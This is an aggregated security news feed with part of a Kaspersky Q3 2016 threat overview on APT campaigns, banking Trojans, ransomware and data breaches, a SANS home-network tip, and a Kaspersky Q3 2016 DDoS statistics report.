One of the most noteworthy features of ProjectSauron is the deliberate avoidance of patterns: the implants used by the group are customized for each victim and are never re-used. This makes the use of traditional Indicators of Compromise (IoC) almost useless. This approach, along with the use of multiple routes for the exfiltration of stolen data (such as legitimate e-mail channels and DNS) enables ProjectSauron to conduct well-hidden, long-term spying campaigns in targeted networks.

Key features of ProjectSauron:

  • core implants that are unique for each victim;
  • use of legitimate software update scripts;
  • use of backdoors that download new modules or run commands in memory only;
  • focus on information relating to custom network encryption software;
  • use of low-level tools orchestrated by high-level LUA scripts (the use of LUA is very rare – previously seen only in Flame and Animal Farm attacks;
  • use of specially prepared USB drives to jump across air-gapped networks, with hidden compartments for storing stolen data;
  • use of multiple exfiltration mechanisms to conceal transfer of data in day-to-day traffic.

The method used to initially infect victims remains unknown.

The single use of unique methods, such as control server, encryption keys and more, in addition to the adoption of cutting-edge techniques from other major threats groups, is new. The only effective way to withstand such threats is to deploy multiple layers of security, with sensors to monitor for even the slightest anomaly in organizational workflow, combined with threat intelligence and forensic analysis. You can find further discussion of the methods available to deal with such threats here.

ShadowBrokers

In August, a person or group going under the name ‘ShadowBrokers’ claimed to possess files belonging to the Equation group. They provided links to two PGP encrypted archives. They provided the password to the first for free, but ‘auctioned’ the second, setting the price at 1 million BTC (1/15th of the bitcoins in circulation).

Having uncovered the Equation group in February 2015, we were interested in examining the first archive. It contains almost 300MB of firewall exploits, tools and scripts, under cryptonyms such as BANANAUSURPER, BLATSTING and BUZZDIRECTION. Most of the files are at least three years old, with change entries pointing to August 2013 and the newest time-stamp dating to October 2013.

The Equation group makes extensive use of RC5 and RC6 encryption algorithms (these algorithms were designed by Ronald Rivest in 1994 and 1998 respectively). The free trove provided by ShadowBrokers includes 347 different instances of RC5 and RC6 implementations. The implementation is functionally identical with that found in the Equation malware – and has not been seen elsewhere.

The code similarity makes us believe with a high degree of confidence that the tools from the ShadowBrokers leak are related to the malware from the Equation group.

Operation Ghoul

In June, we noticed a wave of spear-phishing e-mails with malicious attachments. The messages, sent mainly to top and middle level managers of numerous companies, appeared to be coming from a bank in the UAE. The messages claimed to offer payment advice from the bank and included an attached SWIFT document. But the archive really contained malware. Further investigation revealed that the June attacks were the most recent operation of a group that researchers had been tracking for more than a year, named Operation Ghoul by Kaspersky Lab.

The group successfully attacked more than 130 organizations from 30 countries, including Spain, Pakistan, UAE, India, Egypt, the United Kingdom, Germany and Saudi Arabia. Based on information obtained from the sink-hole of some C2 servers, the majority of the target organizations work in the industrial and engineering sectors. Others include shipping, pharmaceutical, manufacturing, trading and educational organizations.

The malware used by the Operation Ghoul group is based on the commercial spyware kit Hawkeye, sold openly on the Dark Web. Once installed, the malware collects interesting data from the victim’s computer, including keystrokes, clipboard data, FTP server credentials, account data from browsers, messaging clients, e-mail clients and information about installed applications. This data is sent to the group’s C2 servers.

The aim of the campaign seems to be financial profit – all the targeted organizations hold valuable data that can be sold on the black market.

The continued success of social engineering as a way of gaining a foothold in target organizations highlights the need for businesses to make staff awareness and education a central component of their security strategy.

Malware stories Lurk

In June 2016 we reported on the Lurk banking Trojan, used to systematically siphon money from the accounts of commercial organizations in Russia – among them, a number of banks. The police estimate the losses caused by this Trojan at around $45 million.

During our research into this Trojan, it became apparent that victims of Lurk had also installed the remote administration software, Ammyy Admin. While we didn’t give it much thought at first, it became apparent that the official Ammyy Admin website had been compromised and was being used by the Lurk gang as part of a watering-hole attack: the Trojan was downloaded to victim’s computers along with the legitimate software.

The dropper on the Ammyy Admin site started distributing a different Trojan on 1 June 2016, ‘Trojan-PSW.Win32.Fareit’: this was the day that the alleged creators of the Lurk Trojan were arrested. It seems that those responsible for the Ammyy Admin website breach were happy to sell their Trojan dropper to anyone who wanted to distribute malware from the compromised site.

The banking Trojan wasn’t the only cybercriminal activity the Lurk group was involved in. The group also developed the Angler exploit kit, a set of malicious programs designed to exploit vulnerabilities in widespread software to install malware. This exploit kit was originally developed to provide a reliable and effective delivery channel for the group’s malware. However, in 2013 the group started to rent out the kit to anyone who was willing to pay for it – probably to help pay for the group’s huge network infrastructure and large number of ‘staff’. The Angler exploit kit became one of the most powerful tools available on the criminal underground. Unlike the Lurk banking Trojan, which focused on victims in Russia, Angler has been used by attackers across the world – including the groups behind the CryptXXX and TeslaCrypt ransomware and the Neverquest banking Trojan (the latter was used against almost 100 banks). The operations of Angler were disrupted after the arrest of the alleged members of the Lurk group.

In Q3 2016, 45.2M unique malicious URLs were recognized by @kaspersky web antivirus components #KLreport #IT

Tweet

The group was involved in other side activities too. For more than five years, the group moved from developing very powerful malware for automated money theft with Remote Banking Services software, to sophisticated theft involving SIM-card swap fraud, to becoming hacking specialists familiar with the internal infrastructure of banks.

Kaspersky Lab provided assistance to the Russian police in the investigation into the group behind the Lurk Trojan. The arrests marked the culmination of a six-year investigation by our Computer Incidents Investigation Team. You can read about the investigation here.

Ransomware

Hardly a month goes by without reports of ransomware attacks in the media: for example, a recent report suggested that 28 NHS trusts in the UK have fallen victim to ransomware in the last 12 months. Most ransomware attacks are directed at consumers, but a significant proportion target businesses (around 13 per cent in 2015-16). The Kaspersky Lab IT Security Risks Survey 2016 indicated that around 42 per cent of small and medium businesses became victims of ransomware in the 12 months up to August 2016.

One recent ransomware campaign demanded a massive two bitcoins (around $1,300) as a ransom. The ransomware program, named Ded Cryptor, changes the wallpaper on the victim’s computer to a picture of an evil-looking Santa Claus.

The modus operandi of this program (i.e. encrypted files, scary image, and ransom demand) is unremarkable, but the pre-history of this attack is interesting. It is based on the EDA2 open-source ransomware code, developed by Utku Sen as part of a failed experiment. Utku Sen, a security expert from Turkey, created a ransomware program and published the code online. He realized that cybercriminals would use the code to create their own cryptors, but hoped that this would help security researchers to understand how cybercriminals think and code, thereby making their own efforts to block ransomware more effective.

Ded Cryptor was just one of many ransomware programs spawned by EDA2. Another such program that we saw recently was Fantom. This was interesting not just because of its connection to EDA2, but because it simulates a genuine-looking Windows update screen

This is displayed while Fantom is encrypting the victim’s files in the background. The fake update program runs in full-screen mode, visually blocking access to other programs and distracting the victim from what’s really happening. Once the encryption has been completed, Fantom displays a more typical message.

There’s no doubt that public awareness of the problem is growing, but it’s clear that consumers and organizations alike are not doing enough to combat the threat; and cybercriminals are capitalising on this – this is clearly reflected in the growing number of ransomware attacks.

It’s important to reduce your exposure to ransomware (and we’ve outlined important steps you can take here and here). However, there’s no such thing as 100 per cent security, so it’s also important to mitigate the risk. In particular, it’s vital to ensure that you have a backup, to avoid facing a situation where the only choices are to pay the cybercriminals or lose your data. It’s never advisable to pay the ransom.

In Q3 2016, @kaspersky web #antivirus detected 12,657,673 unique malicious objects #KLreport #netsec

Tweet

If you do find yourself in a situation where your files are encrypted and you don’t have a backup, ask your anti-malware vendor if they can help and check the No More Ransom website, to see if it holds the keys to decrypt your data. This is a joint initiative by the National High Tech Crime Unit of the Netherlands’ police, Europol’s European Cybercrime Centre, Kaspersky Lab and Intel Security – designed to help victims of ransomware retrieve their encrypted data without paying cybercriminals.

In a recent ‘ask the expert‘ session, Jornt van der Wiel, an expert from Kaspersky Lab’s Global Research and Analysis Team, provided useful insights into ransomware.

Data breaches

Personal information is a valuable commodity, so it’s no surprise that cybercriminals target online providers, looking for ways to bulk-steal data in a single attack. We’ve become accustomed to the steady stream of security breaches reported in the media. This quarter has been no exception, with data leaks from the official forum of DotA 2, Yahoo and others.

Some of these attacks resulted in the theft of huge amounts of data, highlighting the fact that many companies are failing to take adequate steps to defend themselves. Any organization that holds personal data has a duty of care to secure it effectively. This includes hashing and salting customer passwords and encrypting other sensitive data.

Consumers can limit the damage of a security breach at an online provider by ensuring that they choose passwords that are unique and complex: an ideal password is at least 15 characters long and consists of a mixture of letters, numbers and symbols from the entire keyboard. As an alternative, people can use a password manager application to handle all this for them automatically.

It’s also a good idea to use two-factor authentication, where an online provider offers this feature – requiring customers to enter a code generated by a hardware token, or one sent to a mobile device, in order to access a site, or at least in order to make changes to account settings.

Given the potential impact of a security breach, it’s hardly surprising to see regulatory authorities paying closer attention to the issue. The UK Information Commissioner’s Office (ICO) recently issued a record fine of £400,000 to Talk Talk for the company’s ‘failure to implement the most basic cyber security measures’, related to the attack on the company in October 2015. In the view of the ICO, the record fine ‘acts as a warning to others that cyber security is not an IT issue, it is a boardroom issue’.

The EU General Data Protection Regulation (GDPR), which comes into force in May 2018, will require companies to notify the regulator of data breaches, with significant fines for failure to secure personal data. You can find an overview of the regulation here.

We took a look back at the impact of the Ashley Madison breach, one year after the attack that led to the leak of customer data, offering some good tips to anyone who might be considering looking online for love (and good advice for managing any online account).

Secure Your Home Wi-Fi Network

SANS Tip of the Day - Wed, 11/02/2016 - 01:00
Be aware of all the devices connected to your home network, including baby monitors, gaming consoles, TVs, appliances or even your car. Ensure all those devices are protected by a strong password and/or are running the latest version of their operating system.

Kaspersky DDOS intelligence report for Q3 2016

Malware Alerts - Mon, 10/31/2016 - 04:57

Q3 events Cybercrime as a Service

In the last few months the scale of the global ‘Cybercrime as a Service’ infrastructure has been revealed – fully commercialized, with DDoS as one of the most popular services capable of launching attacks the likes of which have never seen before in terms of volume and technological complexity.

Against this background, Europol published the 2016 Internet Organized Crime Threat Assessment (IOCTA) on 28 September, which is based on the experiences of law enforcement institutions within the EU member states. The report clearly ranks DDoS in first place as a key threat and that any “Internet facing entity, regardless of its purpose or business, must consider itself and its resources to be a target for cybercriminals”.

Most likely, this stems from early September when Brian Krebs, an industry security expert, published an investigation outlining the business operations of a major global DDoS botnet service called vDOS and its principal owners, two young men in Israel. The culprits have been arrested and investigations are ongoing, but the sheer scale of their business is stunning.

Based on a subscription scheme, starting from $19.99 per month, tens of thousands of customers paid more than $600,000 over the past two years to vDOS. In just four months between April and July, vDOS launched more than 277 million seconds of attack time, or approximately 8.81 years’ worth of attack traffic.

It was no wonder, that shortly afterwards a DDoS attack brought down Brian Krebs’s website with a traffic volume close to 620 Gbps, making it one of the biggest attacks the Internet has ever witnessed, only to be topped several days later by another attack close to 1 Tbps that hit France’s OVH. The attack vector, as Octava Klaba, CTO at OVH reported, looks like the same Internet of Things (IoT) botnet totaling 152,464 devices – mainly webcams, routers and thermostats – that brought down Brian Krebs’s website.

To make the situation even worse, hackers just released the Mirai source code, which, according to security experts, was responsible for the aforementioned DDoS attacks. The code includes a built-in scanner to look for vulnerable IoT devices and enrolls them into a botnet. With this, we expect to see a new wave of commercial services like vDOS and DDoS attacks in the coming months.

The Internet of Things is increasingly becoming a powerful tool for attackers, facilitated by the neglect for information security both on the part of vendors and users.

So, check that your devices connected to the Internet have a strong security setup.

‘Political’ DDoS attacks

DDoS is widely used in politics. In July of this year, an international tribunal stated China’s territorial claims to the Spratly archipelago in the South China Sea were groundless, and almost immediately at least 68 sites belonging to various Philippine government institutions were subjected to powerful DDoS attacks. The international press called these incidents part of a long-term cyberespionage campaign launched by China in its struggle for sovereignty of the Spratly archipelago.

Attack on a broker

Cybercriminals have identified the most vulnerable targets for DDoS extortion purposes – broker companies. They are high-turnover businesses that are also extremely dependent on web services. The Taiwanese company First Securities recently received a demand for 50 bitcoins (about $32,000) from unknown persons. After refusing to pay, the company’s website was targeted by a DDoS attack, which made bidding for the company’s clients impossible. Meanwhile, the president of First Securities released a statement to the press saying they had experienced a “trade slowdown” that only affected some of their investors.

Assessing the damage caused by DDoS attacks

B2B International, at the request of Kaspersky Lab, conducted the study called IT Security Risks 2016. According to the results, corporations are suffering increasing damage from DDoS attacks: a single attack can cost a company more than $1.6 billion in losses. At the same time, 8 out of 10 companies are subjected to several attacks per year.

Trend of the quarter: SSL-based DDoS attacks

According to Kaspersky DDoS Protection, the number of “smart” HTTPS-based DDoS attacks on applications increased in the third quarter of 2016. These attacks boast a number of important advantages that make a successful attack more likely.

Establishing a secure connection requires considerable resources, despite operating speeds for cryptographic algorithms constantly increasing (e.g., the elliptic curve algorithm has made it possible to enhance the performance of encryption while maintaining the persistence level). For the sake of comparison, a properly configured web server is capable of processing tens of thousands of new HTTP connections per second, but when processing encrypted connections this capacity falls to just hundreds of connections per second.

The use of hardware crypto accelerators makes it possible to significantly increase this value. However, this doesn’t help much considering the current reality of cheap and readily available rented servers, high-capacity communication channels, as well as known vulnerabilities that allow cybercriminals to build larger botnets. They can carry out a successful DDoS attack by creating a load that exceeds the performance of expensive hardware solutions.

A typical example of a “smart” attack is a relatively small number of queries being sent to the “load-heavy” parts of websites (as a rule, search forms are chosen) inside a small number of encrypted connections. Those requests are almost invisible in the overall traffic flow, and at a low intensity they are often very effective. At the same time, decryption and analysis of traffic is only possible on the web-server side.

Encryption also complicates the operation of specialized systems designed to protect against DDoS attacks (especially solutions used by communications providers). Decrypting traffic on-the-fly in order to analyze the content of network packets is often not possible during such attacks due to technical or security reasons (it’s not permitted to pass a server’s private key to third-party organizations, mathematical limitations prevent access to the information in encrypted packets in transit traffic). This significantly reduces the effectiveness of protection against such attacks.

The growing proportion of “smart” DDoS attacks is caused in no small part by the fact that amplification-type attacks, the most popular attack type in recent times, are becoming increasingly difficult to implement. On the Internet, the number of vulnerable servers that can be used to organize such attacks is steadily falling. In addition, most of these attacks have similar features, making it easy to block them completely, and ensuring their effectiveness is eroded over time.

The desire of website owners to protect data and improve privacy levels, combined with cheaper computing capacities have resulted in a growing trend: classic HTTP is being replaced by HTTPS, leading to an increase in the proportion of resources using encryption. The development of web-based technology encourages active implementation of the new HTTP/2 protocol, in which operations without encryption are not supported by the latest browsers.

We believe that the number of encryption-based attacks will grow. For developers of information security solutions this requires an immediate reappraisal of their approach to combating distributed attacks, because today’s tried and tested solutions may soon become ineffective.

Statistics for botnet-assisted DDoS attacks Methodology

Kaspersky Lab has extensive experience in combating cyber threats, including DDoS attacks of various types and levels of complexity. The company’s experts monitor botnet activity with the help of the DDoS Intelligence system.

DDoS Intelligence (part of Kaspersky DDoS Protection) is designed to intercept and analyze commands sent to bots from command and control (C&C) servers, and does not have to wait until user devices are infected or cybercriminal commands are executed in order to gather data.

This report contains the DDoS Intelligence statistics for the third quarter of 2016.

In the context of this report, a single (separate) DDoS attack is defined as an incident during which any break in botnet activity lasts less than 24 hours. If the same web resource was attacked by the same botnet after a break of more than 24 hours, this is regarded as a separate DDoS attack. Attacks on the same web resource from two different botnets are also regarded as separate attacks.

The geographic distribution of DDoS victims and C&C servers is determined according to their IP addresses. In this report, the number of DDoS targets is calculated based on the number of unique IP addresses reported in the quarterly statistics.

It is important to note that DDoS Intelligence statistics are limited to those botnets detected and analyzed by Kaspersky Lab. It should also be noted that botnets are just one of the tools used to carry out DDoS attacks; therefore, the data presented in this report does not cover every DDoS attack that has occurred within the specified time period.

Q3 Summary
  • Resources in 67 countries (vs. 70 in Q2) were targeted by DDoS attacks in Q3 2016.
  • 62.6% of targeted resources were located in China.
  • China, the US and South Korea remained leaders in terms of both the number of DDoS attacks and number of targets. For the first time both rankings included Italy.
  • The longest DDoS attack in Q3 2016 lasted for 184 hours (or 7.6 days) – significantly shorter than the previous quarter’s maximum (291 hours or 12.1 days).
  • A popular Chinese search engine was subjected to the largest number of attacks (19) over the reporting period.
  • SYN DDoS, TCP DDoS and HTTP DDoS remain the most common DDoS attack scenarios. The proportion of attacks using the SYN DDoS method continued to grow, increasing by 5 p.p., while the shares of TCP DDoS and HTTP DDoS continued to decline.
  • In Q3 2016, the percentage of attacks launched from Linux botnets continued to increase and reached 78.9% of all detected attacks.
Geography of attacks

In Q3 2016, the geography of DDoS attacks narrowed to 67 countries, with China accounting for 72.6% (4.8 p.p. less than the previous quarter). In fact, 97.4% of the targeted resources were located in just 10 countries. The other two countries in the top three switched places – the US (12.8%) overtook South Korea (6.3%) to become the second most targeted country.

Distribution of DDoS attacks by country, Q2 2016 vs. Q3 2016

One entry of note to the rating of most targeted countries was Italy, appearing for the first time ever and accounting for 0.6% of all attacks. In all, the TOP 10 included three Western European countries (Italy, France and Germany).

This quarter’s statistics show that targets within the leading 10 countries accounted for 96.9% of all attacks.

Distribution of unique DDoS attack targets by country, Q2 2016 vs. Q3 2016

In Q3 2016, 62.6% of attacks (8.7 p.p. less than the previous quarter) targeted resources located in China. However, targets in the US became more attractive for cybercriminals – the country’s share accounted for 18.7% compared with 8.9% in the previous quarter. South Korea rounded off the top three – its contribution decreased by 2.4 p.p. and amounted to 8.7%.

The shares of the other countries in the TOP 10 increased, with the exception of France (0.4%), which saw a fall of 0.1 p.p. Japan (1.6%) and Italy (1.1%) each saw a 1 p.p. increase, and as a result, Italy entered the TOP 10 for the first time and went straight in at 6th place (Ukraine left the TOP 10). The proportion of attacks targeting Russia also grew significantly – from 0.8% to 1.1%.

This rating also included three Western European countries – Italy, France and the Netherlands.

Changes in DDoS attack numbers

DDoS activity was relatively uneven in Q3 2016. The period between 21 July and 7 August was marked by the highest DDoS activity, with peaks in the number of attacks registered on 23 July and 3 August. From 8 August, DDoS activity plummeted and resulted in a lull which lasted from 14 August till 6 September. The smallest number of attacks was recorded on 3 September (22 attacks). The largest number of attacks was observed on 3 August – 1,746 attacks. Note that this is the highest figure for the first three quarters of 2016. Most of these attacks took place on the servers of just one service provider located in the United States.

Number of DDoS attacks over time* in Q3 2016

*DDoS attacks may last for several days. In this timeline, the same attack can be counted several times, i.e. one time for each day of its duration.

In Q3, Friday was the most active day of the week for DDoS attacks (17.3% of attacks), followed by Thursday (15.2%). Monday, which was second in Q2 with 15%, became the quietest day of the week in terms of DDoS attacks (12.6%).

Distribution of DDoS attack numbers by day of the week, Q2 and Q3 2016

Types and duration of DDoS attacks

The rating of the most popular attack methods saw no considerable changes from the previous quarter. The SYN DDoS method has further strengthened its position as leader: its share increased from 76% to 81%. The proportion of the other attack types decreased slightly. ICMP DDoS was most affected: its share decreased by 2.6 p.p.

Distribution of DDoS attacks by type, Q2 and Q3 2016

Attacks that last no more than four hours remained the most popular: in Q3 their share increased by 9.2 p.p., accounting for 69%. Attacks that lasted 5-9 hours remained in second. Meanwhile, the percentage of longer attacks decreased considerably – the share of attacks lasting 100-149 hours fell from 1.7% in Q2 to 0.1% in the third quarter. There were very few cases of attacks lasting longer than that.

Distribution of DDoS attacks by duration (hours), Q2 and Q3 2016

The longest DDoS attack in Q3 2016 only lasted for 184 hours (targeting a Chinese provider), which is significantly lower than the Q2 maximum of 291 hours. A Chinese search engine had the unenviable distinction of being attacked most – it was targeted 19 times during the quarter.

C&C servers and botnet types

In Q3, the highest number of C&C servers (45.8%) was detected in South Korea, although this country’s contribution is considerably smaller compared to the previous quarter (69.6%).

The top three countries hosting the most C&C servers remained unchanged – South Korea, China and the US – although their total share was 67.7% vs. 84.8% in Q2.

The number of active C&C servers in Western Europe is growing – the TOP 10 included the Netherlands (4.8%), the UK (4.4%), and France (2%). To recap, three Western European countries entered both the TOP 10 countries subjected to the highest number of attacks and the TOP 10 countries with the highest number of targets.

Among the newcomers to the C&C rating were Hong Kong and Ukraine, each with a share of 2%.

Distribution of botnet C&C servers by country in Q3 2016

In Q3, Linux-based DDoS bots remained the clear leader and the share of attacks launched from Linux botnets continued to grow, accounting for 78.9% vs. 70.8% in Q2. This correlates with the growing popularity of SYN DDoS for which Linux bots are the most appropriate tool. In addition, this can be explained by the growing popularity of Linux-based IoT devices used for DDoS attacks, and will most probably be boosted further after the leakage of Mirai.

Correlation between attacks launched from Windows and Linux botnets, Q2 and Q3 2016

Q3 continues the trend of Linux dominance from the previous quarter. Prior to Q2 2016, the difference between the share of Windows- and Linux-based botnets did not exceed 10 p.p. for several quarters in a row.

The majority of attacks – 99.8% – were carried out by bots belonging to a single family. Cybercriminals launched attacks using bots from two different families in just 0.2% of cases.

Conclusion

‘Classic’ botnet attacks based on widespread malware tools such as Pandora, Drive, etc. have been well researched by analysts who have developed effective and simple methods of neutralizing attacks that utilize these tools. This is increasingly forcing cybercriminals to use more sophisticated attack methods, including data encryption and new approaches to the development of tools used for organizing attacks and building botnets.

Another interesting trend this quarter was the increased activity of DDoS botnets in Western Europe. For the first time in a year the TOP 10 most attacked countries included three Western European countries – Italy, France and Germany. This correlates with the increased number of active C&C servers in Western Europe, particularly in France, the UK and the Netherlands. Overall, Western European countries accounted for about 13% of active DDoS botnet C&C servers.